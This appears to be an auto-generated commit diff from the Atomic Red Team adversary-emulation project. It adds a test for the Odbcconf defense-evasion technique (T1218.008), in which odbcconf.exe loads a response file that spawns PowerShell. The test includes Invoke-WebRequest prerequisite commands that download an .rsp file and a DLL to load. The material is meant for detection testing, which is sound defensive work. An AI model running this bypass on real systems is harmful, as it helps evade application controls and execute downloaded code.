Generated docs from job=generate-docs branch=master [ci skip]

2022-07-04 17:44:35 +00:00
parent 4bf0024d22
commit e1c2feefe4
6 changed files with 88 additions and 0 deletions
@@ -221,6 +221,7 @@ defense-evasion,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666
 defense-evasion,T1548.001,Setuid and Setgid,4,Make and modify capabilities of a binary,db53959c-207d-4000-9e7a-cd8eb417e072,sh
 defense-evasion,T1548.001,Setuid and Setgid,5,Provide the SetUID capability to a file,1ac3272f-9bcf-443a-9888-4b1d3de785c1,sh
 defense-evasion,T1218.008,Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt
+defense-evasion,T1218.008,Odbcconf,2,Odbcconf.exe - Load Response File,331ce274-f9c9-440b-9f8c-a1006e1fce0b,command_prompt
 defense-evasion,T1562.006,Indicator Blocking,1,Auditing Configuration Changes on Linux Host,212cfbcf-4770-4980-bc21-303e37abd0e3,bash
 defense-evasion,T1562.006,Indicator Blocking,2,Logging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash
 defense-evasion,T1562.006,Indicator Blocking,3,Disable Powershell ETW Provider - Windows,6f118276-121d-4c09-bb58-a8fb4a72ee84,powershell
@@ -162,6 +162,7 @@ defense-evasion,T1070.001,Clear Windows Event Logs,3,Clear Event Logs via VBA,1b
 defense-evasion,T1134.002,Create Process with Token,1,Access Token Manipulation,dbf4f5a9-b8e0-46a3-9841-9ad71247239e,powershell
 defense-evasion,T1134.002,Create Process with Token,2,WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique,ccf4ac39-ec93-42be-9035-90e2f26bcd92,powershell
 defense-evasion,T1218.008,Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt
+defense-evasion,T1218.008,Odbcconf,2,Odbcconf.exe - Load Response File,331ce274-f9c9-440b-9f8c-a1006e1fce0b,command_prompt
 defense-evasion,T1562.006,Indicator Blocking,3,Disable Powershell ETW Provider - Windows,6f118276-121d-4c09-bb58-a8fb4a72ee84,powershell
 defense-evasion,T1562.006,Indicator Blocking,4,Disable .NET Event Tracing for Windows Via Registry (cmd),8a4c33be-a0d3-434a-bee6-315405edbd5b,command_prompt
 defense-evasion,T1562.006,Indicator Blocking,5,Disable .NET Event Tracing for Windows Via Registry (powershell),19c07a45-452d-4620-90ed-4c34fffbe758,powershell
@@ -313,6 +313,7 @@
 - T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1218.008 Odbcconf](../../T1218.008/T1218.008.md)
  - Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows]
+  - Atomic Test #2: Odbcconf.exe - Load Response File [windows]
 - T1144 Gatekeeper Bypass [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1045 Software Packing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -234,6 +234,7 @@
 - T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1218.008 Odbcconf](../../T1218.008/T1218.008.md)
  - Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows]
+  - Atomic Test #2: Odbcconf.exe - Load Response File [windows]
 - T1045 Software Packing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -12287,6 +12287,39 @@ defense-evasion:

          '
        name: command_prompt
+    - name: Odbcconf.exe - Load Response File
+      auto_generated_guid: 331ce274-f9c9-440b-9f8c-a1006e1fce0b
+      description: |
+        Execute arbitrary response file that will spawn PowerShell.exe.
+        Source files: https://github.com/woanware/application-restriction-bypasses
+      supported_platforms:
+      - windows
+      input_arguments:
+        rsp_file_name:
+          description: Response file name to load
+          type: String
+          default: T1218.008.rsp
+        rsp_file_path:
+          description: Response file path
+          type: String
+          default: PathToAtomicsFolder\T1218.008\bin\
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'T1218.008.rsp must exist on disk at specified location (#{rsp_file_path}#{rsp_file_name})
+
+          '
+        prereq_command: 'if (Test-Path #{rsp_file_path}#{rsp_file_name}) {exit 0}
+          else {exit 1}
+
+          '
+        get_prereq_command: |
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/bin/T1218.008.rsp" -OutFile "#{rsp_file_path}#{rsp_file_name}"
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/bin/o.dll" -OutFile "#{rsp_file_path}\o.dll"
+      executor:
+        command: |
+          cd #{rsp_file_path}
+          odbcconf.exe -f #{rsp_file_name}
+        name: command_prompt
  T1144:
    technique:
      x_mitre_platforms:
@@ -9,6 +9,8 @@ Adversaries may abuse odbcconf.exe to bypass application control solutions that

 - [Atomic Test #1 - Odbcconf.exe - Execute Arbitrary DLL](#atomic-test-1---odbcconfexe---execute-arbitrary-dll)

+- [Atomic Test #2 - Odbcconf.exe - Load Response File](#atomic-test-2---odbcconfexe---load-response-file)
+

 <br/>

@@ -55,4 +57,53 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato



+<br/>
+<br/>
+
+## Atomic Test #2 - Odbcconf.exe - Load Response File
+Execute arbitrary response file that will spawn PowerShell.exe.
+Source files: https://github.com/woanware/application-restriction-bypasses
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 331ce274-f9c9-440b-9f8c-a1006e1fce0b
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| rsp_file_name | Response file name to load | String | T1218.008.rsp|
+| rsp_file_path | Response file path | String | PathToAtomicsFolder&#92;T1218.008&#92;bin&#92;|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+cd #{rsp_file_path}
+odbcconf.exe -f #{rsp_file_name}
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: T1218.008.rsp must exist on disk at specified location (#{rsp_file_path}#{rsp_file_name})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{rsp_file_path}#{rsp_file_name}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/bin/T1218.008.rsp" -OutFile "#{rsp_file_path}#{rsp_file_name}"
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/bin/o.dll" -OutFile "#{rsp_file_path}\o.dll"
+```
+
+
+
+
 <br/>